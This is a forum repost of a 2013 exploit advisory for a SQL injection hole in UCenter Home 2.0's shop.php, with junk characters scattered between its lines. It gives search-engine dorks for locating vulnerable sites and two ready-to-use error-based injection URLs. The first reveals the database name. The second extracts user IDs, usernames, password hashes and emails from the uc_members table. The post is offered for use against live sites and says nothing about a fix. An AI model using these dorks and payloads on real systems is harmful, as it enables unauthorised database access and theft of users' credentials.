中国网络渗透测试联盟
标题:
UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
[打印本页]
作者:
admin
时间:
2013-2-27 21:31
标题:
UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
) [4 n+ Z( y: V' G) R
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
1 d; @) U7 L1 @$ |/ g& l: g& a
! R% o# W" ?# `/ ?, g$ I) P
. t) `; q" e* U$ A: s) w; R
2 I6 m W5 o+ x+ V/ U* i
*/ Author : KnocKout
* G; Z8 Q' N R0 N# e" u ^: _
* `$ V! R- ~. Q+ [! @7 q! ?
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
1 X/ [" |) [4 k% V9 O4 X9 O# a
5 d) w0 n- m" x1 |9 {4 [; W% t
*/ Contact:
knockoutr@msn.com
0 P9 i6 W8 N& o( `9 Z. c
, D5 U# L& j! E3 d H
*/ Cyber-Warrior.org/CWKnocKout
2 l+ u( \2 q! T0 d( f
( n; ^) c5 {& U- p
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
6 v |4 @+ y4 u3 Y& S: k
3 ^2 K' k/ {6 V) C" R
Script : UCenter Home
: d( A$ W d, k& o3 |2 X
7 }( F0 B( k+ j j% {* U
Version : 2.0
- T5 G$ y- d6 A1 X9 `/ N+ E
' h$ {" F" S5 c% [" V% G7 I
Script HomePage :
http://u.discuz.net/
5 N! t3 a1 W+ L$ _; w
' C* q( ?& D0 ?; K ` b1 t
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
! m, e# S' P% t, \; [
8 r9 g/ T) D: i O
Dork : Powered by UCenter inurl:shop.php?ac=view
9 H4 @4 @8 s2 D( H
; { `- d& k2 J
Dork 2 : inurl:shop.php?ac=view&shopid=
% y/ f% \1 t) Q9 T, k0 w$ U
- k5 c' k) ?- G- X5 o) I
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) E' a' q6 ~: g; }5 Z8 f- Z/ V% J
/ b- [4 ]4 K! W/ L: ?
Vuln file : Shop.php
7 s7 T3 k; r# U: `
y9 X2 j1 Z7 `% d a8 J
value's : (?)ac=view&shopid=
z' L% _2 Z0 ?& W
3 D) [; P6 x# t8 j
Vulnerable Style : SQL Injection (MySQL Error Based)
8 Y& E; P' t" W
9 r+ u( y( K! P4 S; l N. s+ L
Need Metarials : Hex Conversion
1 R/ L6 k3 ~9 g
7 n8 `% }. I' N2 e" w, g* x
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
6 T2 a7 g3 d- M/ q* d0 R
+ @ v$ I- J; G$ D
Your Need victim Database name.
* Z' g9 K$ b B" ?% K+ @5 F
5 B; x7 w) L+ s7 L7 E
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
4 N8 w! d m3 X5 o' d# \
' i8 r, T6 x) F
..
( L8 y; N/ J5 x& |
& D+ C4 R( a) d& D' A/ g! ?
DB : Okey.
9 V: C! p4 H% R/ P3 ?% a
1 H- b$ g/ W6 c1 E( T0 q3 `. Z
your edit DB `[TARGET DB NAME]`
5 w# T% Q$ N6 T
( i4 w9 e0 K6 r( ^8 R
Example : 'hiwir1_ucenter'
& N9 A! }, G! w, P. B
% c) g" s; I* U
Edit : Okey.
4 R8 t( j! k+ }9 s
& A N( I1 Y8 Y) j- {8 V ` l
Your use Hex conversion. And edit Your SQL Injection Exploit..
* P2 s5 A6 n9 \" L) N6 ^9 m
4 _" Q6 {5 d& \ ~* E9 p8 U2 e
! I/ A; m3 N" {8 \
5 o! j2 @: k' ~3 L% i; H7 w
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
$ G3 D, b! h9 h8 e6 ^: Q3 {
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2